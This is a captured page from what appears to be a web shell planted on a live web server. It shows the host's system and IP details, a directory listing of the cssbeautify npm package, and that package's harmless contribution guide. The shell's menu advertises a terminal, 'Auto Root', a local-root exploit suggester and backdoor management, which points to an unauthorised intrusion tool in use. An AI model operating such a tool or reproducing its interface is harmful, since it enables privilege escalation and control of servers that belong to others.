Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.116.239.69
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
cssbeautify /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
.npmignore
53
B
-rw-rw-r--
2022-08-30 11:49
CONTRIBUTING.md
1.14
KB
-rw-rw-r--
2022-08-30 11:49
README.md
2.6
KB
-rw-rw-r--
2022-08-30 11:49
cssbeautify.js
14.73
KB
-rw-rw-r--
2022-08-30 11:49
cssbeautify.sublime-project
86
B
-rw-rw-r--
2022-08-30 11:49
cssbeautify.sublime-workspace
17.66
KB
-rw-rw-r--
2022-08-30 11:49
package.json
739
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
# Contribution Guide This page describes how to contribute changes to CSS Beautify. Please do **not** create a pull request without reading this guide first. Failure to do so may result in the **rejection** of the pull request. ## CLA Before we can accept any contributions, you need to sign [Contributor License Agreement](http://en.wikipedia.org/wiki/Contributor_License_Agreement). You can do that using Sencha Labs [online CLA](http://www.sencha.com/cla). ## Coding Policies Make sure that your code passes [JSLint](http://jslint.com) checks. Make sure your patch does break existing tests (open <code>test/index.html</code> in a web browser). If you add a new feature, create a new test associated with that. Feature or enhancement pull request without a corresponding test will **not** be merged. ## Pull Request For the actual contribution, please use [Github pull request](http://help.github.com/pull-requests/) workflow. Please do not create a pull request for multiple unrelated commits. It is strongly recommended to create a topic branch and make the commits as atomic as possible for the merge. This makes it easy to review all the changes.